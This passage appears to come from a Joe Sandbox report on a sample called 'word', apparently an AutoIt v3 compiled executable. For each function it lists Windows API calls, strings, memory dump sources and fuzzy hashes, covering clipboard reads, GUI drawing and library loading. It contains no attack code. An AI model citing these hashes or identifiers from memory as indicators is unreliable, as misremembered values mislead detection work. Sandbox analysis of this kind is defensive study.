                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00459678
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00459686
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00459694
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                            • CopyImage.USER32 ref: 004596EF
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 0045973D
                                                                            • ShowWindow.USER32(?,00000004), ref: 0045974B
                                                                            • CreateWindowExW.USER32 ref: 0045979C
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190), ref: 004597CD
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000001,?,?,00000000,00000000,00000000), ref: 004597D6
                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                            • ShowWindow.USER32(?,00000004), ref: 00459951
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 4040870279-2373415609
                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                            Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 00441E64
                                                                            • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                            • GetSysColorBrush.USER32 ref: 00441E83
                                                                            • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                            • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                            • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                            • InflateRect.USER32 ref: 00441EF0
                                                                            • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                            • FrameRect.USER32 ref: 00441F10
                                                                            • DeleteObject.GDI32(?), ref: 00441F1B
                                                                            • InflateRect.USER32 ref: 00441F75
                                                                            • FillRect.USER32 ref: 00441FB6
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                              • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • Part of subcall function 00433D5C: GetSysColorBrush.USER32 ref: 00433DBF
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                              • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • Part of subcall function 00433D5C: InflateRect.USER32 ref: 00433E54
                                                                              • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                              • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                            • String ID:
                                                                            • API String ID: 69173610-0
                                                                            • Opcode ID: dce2bc532722d6c978516909a4432b3014f370df0f33642fb727b52a40f95e08
                                                                            • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                            • Opcode Fuzzy Hash: dce2bc532722d6c978516909a4432b3014f370df0f33642fb727b52a40f95e08
                                                                            • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                            Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-3360698832
                                                                            • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                            • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                            • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                            • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                            Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                            • GetSysColor.USER32(00000012,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DA3
                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                            • GetSysColorBrush.USER32 ref: 00433DBF
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                            • InflateRect.USER32 ref: 00433E54
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105,?,?,?,?,?,?,?,?,?,?,00441E27,?,?), ref: 00433EE1
                                                                            • InflateRect.USER32 ref: 00433F13
                                                                            • DrawFocusRect.USER32 ref: 00433F1F
                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1582027408-0
                                                                            • Opcode ID: a1eda0670d83d91c39db8fc211a4c9e6f7ce54e9ebbb7b5317678dee4ec240e8
                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                            • Opcode Fuzzy Hash: a1eda0670d83d91c39db8fc211a4c9e6f7ce54e9ebbb7b5317678dee4ec240e8
                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                            Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                            • GetClipboardData.USER32 ref: 0046C64F
                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                            • GetClipboardData.USER32 ref: 0046C6DD
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                            • String ID: HH
                                                                            • API String ID: 589737431-2761332787
                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                            Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                            • DestroyWindow.USER32 ref: 00456731
                                                                            • CreateWindowExW.USER32 ref: 00456779
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                            • String ID: ($,$tooltips_class32
                                                                            • API String ID: 541082891-3320066284
                                                                            • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                            • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                            • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                            • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                            Function 0044A0EA Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 196windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                            • String ID: X+
                                                                            • API String ID: 1744303182-1938338529
                                                                            • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                            • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                            • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                            • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                            Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00454DCF
                                                                            • _wcslen.LIBCMT ref: 00454DE2
                                                                            • __wcsicoll.LIBCMT ref: 00454DEF
                                                                            • _wcslen.LIBCMT ref: 00454E04
                                                                            • __wcsicoll.LIBCMT ref: 00454E11
                                                                            • _wcslen.LIBCMT ref: 00454E24
                                                                            • __wcsicoll.LIBCMT ref: 00454E31
                                                                              • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                            • LoadImageW.USER32 ref: 00454E65
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                            • LoadImageW.USER32 ref: 00454EB7
                                                                            • LoadImageW.USER32 ref: 00454EFB
                                                                            • LoadImageW.USER32 ref: 00454F2C
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                            • DestroyIcon.USER32(?), ref: 00454FA2
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 2511167534-1154884017
                                                                            • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                            • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                            • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                            • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                            Function 004559A8 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 401COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$X+
                                                                            • API String ID: 0-479754480
                                                                            • Opcode ID: 05d0114e8ebae6003f4c2574787cb6c924564815b97d0f339d141b1e2ca56e02
                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                            • Opcode Fuzzy Hash: 05d0114e8ebae6003f4c2574787cb6c924564815b97d0f339d141b1e2ca56e02
                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                            Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 1503153545-1459072770
                                                                            • Opcode ID: c415717466a75288a316d515b14e5e8f322d0704bbcf92787c1049eb4d752d3b
                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                            • Opcode Fuzzy Hash: c415717466a75288a316d515b14e5e8f322d0704bbcf92787c1049eb4d752d3b
                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                            Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                            • _wcscpy.LIBCMT ref: 00452871
                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
